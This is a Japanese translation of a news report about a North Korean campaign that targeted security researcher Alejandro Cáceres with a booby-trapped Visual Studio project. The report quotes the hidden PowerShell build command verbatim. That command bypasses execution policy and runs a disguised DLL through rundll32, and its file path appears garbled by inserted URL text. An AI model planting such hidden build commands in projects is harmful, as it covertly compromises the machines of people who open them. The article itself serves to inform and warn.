ゼロデイハンターが、西側諸国の研究者の脆弱性を盗むことを狙った北朝鮮の攻撃の標的にされたことに気づいたときの「なんてこった!」という瞬間をThe Registerに語った。
アレハンドロ・カセレス氏は、グーグルの脅威分析グループ(TAG)が昨夜明らかにしたキャンペーンの一環として、国家の支援を受けた悪意ある人々の標的にされたことは「正気の沙汰ではないと思った」と語った。
「グーグルの件を読んだ時、正直、声に出して『なんてこった!』と思った。非常識だと思った。国家に攻撃された?俺が!?」と、セキュリティ調査会社ハイペリオン・グレイの共同創業者カセレス氏はエル・レグ紙に語った。
カセレス氏はこの欺瞞行為に激怒し、平壌主導の作戦に関与した北朝鮮の工作員の一人とみられる「ジェームズ・ウィリー」の逮捕につながる情報提供に高額の懸賞金もかけている。
ジェームズ・ウィリーに関する詳細は80Kです。証拠は出典を明記した上で、適切に文書化する必要があります。https://t.co/dTC224DsJc
— シェフ・ゴードン(@TheRealChefG)2021年1月26日
Googleのセキュリティ対策チーム(TAG)は昨夜、「脆弱性の研究開発に取り組むセキュリティ研究者を標的とした進行中の攻撃」を発見したと発表した。TAGはこれらの攻撃を「北朝鮮に拠点を置く政府支援団体」によるものとしている。我々が報じたように、北朝鮮はTwitter、LinkedIn、Telegramなど、様々な手段を通じて情報セキュリティ専門家を標的にしていたが、カセレス氏のケースでは、それ以上の要素があった。
カセレス氏は、以前から知り合い、信頼していた脆弱性ブローカーが、彼を「ニューヨーク出身」のジェームズ・ウィリーという新しい研究者に紹介したとエル・レグ紙に語り、次のように説明した。「私たち3人はグループチャットに参加し、ブルースクリーンを引き起こすドライバーのバグを調べるために、彼がVisual Studioプロジェクトを送ってくれたのです。」
脆弱性ブローカーとは、ソフトウェア製品の脆弱性を悪用する手法を売買する(時に怪しい)人々です。通常、彼らが最も関心を持つのは、いわゆるゼロデイ脆弱性です。これは、 Regの読者ならご存知の通り、プログラムの開発開始当初から存在する、これまで知られていなかった脆弱性です。これらは、犯罪者、国家、そして正当なセキュリティ専門家にとって、明らかに価値のあるものです。
BSODについては、「ジェームズ」はカセレス氏と脆弱性ブローカーに対し、Google Chromeとの関連性を指摘した。これはバグハンターにとってすぐに注目を集める材料となる。世界中で数千万人が利用するソフトウェアに影響を与える脆弱性は稀であり、高額な報酬が期待できる。
蓄積するために投機する
カセレス氏は「ジェームズ」からVisual Studioプロジェクトを開いた際、少し不注意だったことを認めつつも、リスクは軽視した。結局のところ、この人物は保証されていた人物であり、ゼロデイ脆弱性は本物だったのだ。
「コードはすべて合法で、セキュリティに影響を与える可能性のあるクラッシュでした。しかし、Visual Studioプロジェクトを開く際に注意を怠りました」と彼はため息をついた。「この人物はそこそこ知られていたので、特に気に留めませんでした。ゼロデイ脆弱性も確認でき、コードは問題なくコンパイルされ、(グラフィックドライバへの攻撃という)動作も理解できたので、すべて順調だと思っていました」
一部の Visual Studio プロジェクトを開くとコードが実行される可能性があり、これが北朝鮮の攻撃ベクトルでした。
北朝鮮の作戦で使用されたTwitterアカウントをGoogleが合成したもの。右上に「James Willy」とある。
研究成果を「ジェームズ」に帰属させて論文にまとめるという取り決めが破談になり、カセレスはこの出来事をすっかり忘れていた。ところが4、5日後、ブローカーの友人から「Visual Studioのフィッシング詐欺を使って他人のマシンにバックドアを仕掛けようとしている男がいるらしい」と連絡があった。案の定、カセレスは「ジェームズ」から送られてきたVSプロジェクトの中に、決定的な証拠を見つけたのだ。
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\http://Browse.VC.db)){rundll32 x64\Debug\http://Browse.VC.db,ENGINE_get_RAND 6bt7cJNGEb3Bx9yK 2907}
「もしこれが本物でなかったら、彼らは何か変なコードを使うだろうと思っていました」とカセレス氏はThe Register紙に語った。「しかし、ゼロデイ攻撃は、まだ初歩的ではあったものの、確かに存在していたので、この男は本当に助けを必要としていたのだと安心しました。」
カセレス氏は、北朝鮮の攻撃者が自身のマシンにアクセスし、盗んで悪用できる脆弱性を探し出し、いわば投機目的で蓄積しようとしていたのではないかと推測した。影響度の低いゼロデイ脆弱性を焼き尽くし、熱心な研究者から影響度の大きいゼロデイ脆弱性を得るという行為は、少なくとも信憑性があるように思える。
昨年、US-CERTは、北朝鮮のハッカーたちがみかじめ料を得るために裕福な西側諸国の企業を狙っていると警告しており、カセレス氏らを狙ったゼロデイ窃盗作戦もこの戦術と関連している可能性がある。
時には ― ほんのたまにですが ― 邪悪な国家レベルのハッカーが本当にあなたを狙っていることがあります。普通のバグハンティングのプロだからといって、標的にされにくくなるわけではありません。®
